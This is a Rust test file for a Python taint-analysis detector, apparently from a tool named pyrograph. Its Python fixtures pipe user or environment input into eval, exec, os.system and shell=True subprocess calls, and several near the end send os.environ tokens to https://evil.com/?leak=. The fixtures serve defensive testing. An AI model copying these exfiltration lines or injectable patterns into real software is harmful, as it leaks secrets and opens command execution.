#![cfg(feature = "python")]
use pyrograph::{analyze, parse::parse_python};
fn assert_detects(name: &str, source: &str) {
let graph = parse_python(source, &format!("{name}.py")).unwrap();
let findings = analyze(&graph).unwrap();
assert!(!findings.is_empty(), "expected finding for {name}");
}
fn assert_clean(name: &str, source: &str) {
let graph = parse_python(source, &format!("{name}.py")).unwrap();
let findings = analyze(&graph).unwrap();
assert!(findings.is_empty(), "unexpected finding for {name}: {findings:?}");
}
#[test]
fn tp_01_os_environ_to_eval() {
assert_detects("tp_01_os_environ_to_eval", "import os\npayload = os.environ['PAYLOAD']\neval(payload)\n");
}
#[test]
fn tp_02_os_getenv_to_exec() {
assert_detects("tp_02_os_getenv_to_exec", "import os\ncmd = os.getenv('CMD')\nexec(cmd)\n");
}
#[test]
fn tp_03_sys_argv_to_subprocess_run() {
assert_detects("tp_03_sys_argv_to_subprocess_run", "import sys, subprocess\nsubprocess.run(sys.argv[1], shell=True)\n");
}
#[test]
fn tp_04_open_read_to_eval() {
assert_detects("tp_04_open_read_to_eval", "payload = open('payload.py').read()\neval(payload)\n");
}
#[test]
fn tp_05_path_read_text_to_exec() {
assert_detects("tp_05_path_read_text_to_exec", "from pathlib import Path\ncode = Path('payload.py').read_text()\nexec(code)\n");
}
#[test]
fn tp_06_request_form_to_subprocess_call() {
assert_detects("tp_06_request_form_to_subprocess_call", "from flask import request\nimport subprocess\nsubprocess.call(request.form['cmd'], shell=True)\n");
}
#[test]
fn tp_07_request_args_get_to_requests_get() {
assert_detects("tp_07_request_args_get_to_requests_get", "from flask import request\nimport requests\nurl = request.args.get('next')\nrequests.get(url)\n");
}
#[test]
fn tp_08_request_json_to_urlopen() {
assert_detects("tp_08_request_json_to_urlopen", "from flask import request\nfrom urllib.request import urlopen\nurlopen(request.json['url'])\n");
}
#[test]
fn tp_09_input_to_os_system() {
assert_detects("tp_09_input_to_os_system", "import os\ncmd = input()\nos.system(cmd)\n");
}
#[test]
fn tp_10_input_to_compile() {
assert_detects("tp_10_input_to_compile", "src = input()\ncompile(src, '<stdin>', 'exec')\n");
}
#[test]
fn tp_11_open_read_to_pickle_loads() {
assert_detects("tp_11_open_read_to_pickle_loads", "import pickle\nblob = open('payload.pickle').read()\npickle.loads(blob)\n");
}
#[test]
fn tp_12_os_environ_to_requests_post() {
assert_detects("tp_12_os_environ_to_requests_post", "import os, requests\nrequests.post(os.environ['EXFIL_URL'])\n");
}
#[test]
fn tp_13_sys_argv_to_socket_connect() {
assert_detects("tp_13_sys_argv_to_socket_connect", "import sys, socket\nclient = socket.socket()\nclient.connect(sys.argv[1])\n");
}
#[test]
fn tp_14_request_form_to_os_popen() {
assert_detects("tp_14_request_form_to_os_popen", "from flask import request\nimport os\nos.popen(request.form['cmd'])\n");
}
#[test]
fn tp_15_request_args_to_check_output() {
assert_detects("tp_15_request_args_to_check_output", "from flask import request\nimport subprocess\nsubprocess.check_output(request.args['cmd'], shell=True)\n");
}
#[test]
fn tp_16_request_json_get_to_popen() {
assert_detects("tp_16_request_json_get_to_popen", "from flask import request\nimport subprocess\nsubprocess.Popen(request.json.get('cmd'), shell=True)\n");
}
#[test]
fn tp_17_input_to_open_write() {
assert_detects("tp_17_input_to_open_write", "data = input()\nhandle = open('drop.txt', 'w')\nhandle.write(data)\n");
}
#[test]
fn tp_18_pathlib_module_read_text() {
assert_detects("tp_18_pathlib_module_read_text", "import pathlib\npayload = pathlib.Path('payload.py').read_text()\nexec(payload)\n");
}
#[test]
fn tp_19_imported_getenv_alias() {
assert_detects("tp_19_imported_getenv_alias", "from os import getenv\ncode = getenv('PAYLOAD')\neval(code)\n");
}
#[test]
fn tp_20_imported_run_alias() {
assert_detects("tp_20_imported_run_alias", "from flask import request\nfrom subprocess import run\nrun(request.args['cmd'], shell=True)\n");
}
#[test]
fn fp_01_int_sanitizes_cli_to_exec() {
assert_clean("fp_01_int_sanitizes_cli_to_exec", "import sys, subprocess\nvalue = int(sys.argv[1])\nsubprocess.run(value)\n");
}
#[test]
fn fp_02_float_sanitizes_input_to_system() {
assert_clean("fp_02_float_sanitizes_input_to_system", "import os\nvalue = float(input())\nos.system(value)\n");
}
#[test]
fn fp_03_str_sanitizes_request_to_network() {
assert_clean("fp_03_str_sanitizes_request_to_network", "from flask import request\nimport requests\nurl = str(request.args['next'])\nrequests.get(url)\n");
}
#[test]
fn fp_04_bleach_clean_stops_exec() {
assert_clean("fp_04_bleach_clean_stops_exec", "from flask import request\nfrom bleach import clean\nexec(clean(request.form['code']))\n");
}
#[test]
fn fp_05_markupsafe_escape_stops_compile() {
assert_clean("fp_05_markupsafe_escape_stops_compile", "from flask import request\nfrom markupsafe import escape\ncompile(escape(request.args['code']), '<x>', 'exec')\n");
}
#[test]
fn fp_06_shlex_quote_stops_command_injection() {
assert_clean("fp_06_shlex_quote_stops_command_injection", "import os, sys\nfrom shlex import quote\nos.system(quote(sys.argv[1]))\n");
}
#[test]
fn fp_07_basename_stops_path_flow() {
assert_clean("fp_07_basename_stops_path_flow", "from flask import request\nfrom os.path import basename\nhandle = open('drop.txt', 'w')\nhandle.write(basename(request.args['path']))\n");
}
#[test]
fn fp_08_constant_requests_get_is_clean() {
assert_clean("fp_08_constant_requests_get_is_clean", "import requests\nrequests.get('https://example.com')\n");
}
#[test]
fn fp_09_constant_subprocess_run_is_clean() {
assert_clean("fp_09_constant_subprocess_run_is_clean", "import subprocess\nsubprocess.run('ls')\n");
}
#[test]
fn fp_10_request_print_only_is_clean() {
assert_clean("fp_10_request_print_only_is_clean", "from flask import request\nvalue = request.args['x']\nprint(value)\n");
}
#[test]
fn tp_fstring_exfiltration() {
assert_detects(
"tp_fstring_exfiltration",
r#"
import requests
secret = os.environ['TOKEN']
requests.get(f'https://evil.com/?leak={secret}')
"#,
);
}
#[test]
fn tp_format_direct_arg_exfiltration() {
assert_detects(
"tp_format_direct_arg_exfiltration",
r#"
import requests
secret = os.environ['TOKEN']
url = 'https://evil.com/?leak={}'.format(secret)
requests.get(url)
"#,
);
}
#[test]
fn tp_format_locals_unpack_exfiltration() {
assert_detects(
"tp_format_locals_unpack_exfiltration",
r#"
import requests
secret = os.environ['TOKEN']
url = 'https://evil.com/?leak={secret}'.format(**locals())
requests.get(url)
"#,
);
}
#[test]
fn tp_format_map_locals_exfiltration() {
assert_detects(
"tp_format_map_locals_exfiltration",
r#"
import requests
secret = os.environ['TOKEN']
url = 'https://evil.com/?leak={secret}'.format_map(locals())
requests.get(url)
"#,
);
}
#[test]
fn tp_format_os_environ_unpack_exfiltration() {
assert_detects(
"tp_format_os_environ_unpack_exfiltration",
r#"
import os, requests
url = 'https://evil.com/?leak={HOME}'.format(**os.environ)
requests.get(url)
"#,
);
}
#[test]
fn fp_format_locals_all_sanitized() {
assert_clean(
"fp_format_locals_all_sanitized",
r#"
import os
safe = int(os.environ.get('PORT', '8080'))
url = 'https://example.com/{port}'.format(**locals())
os.system(url)
"#,
);
}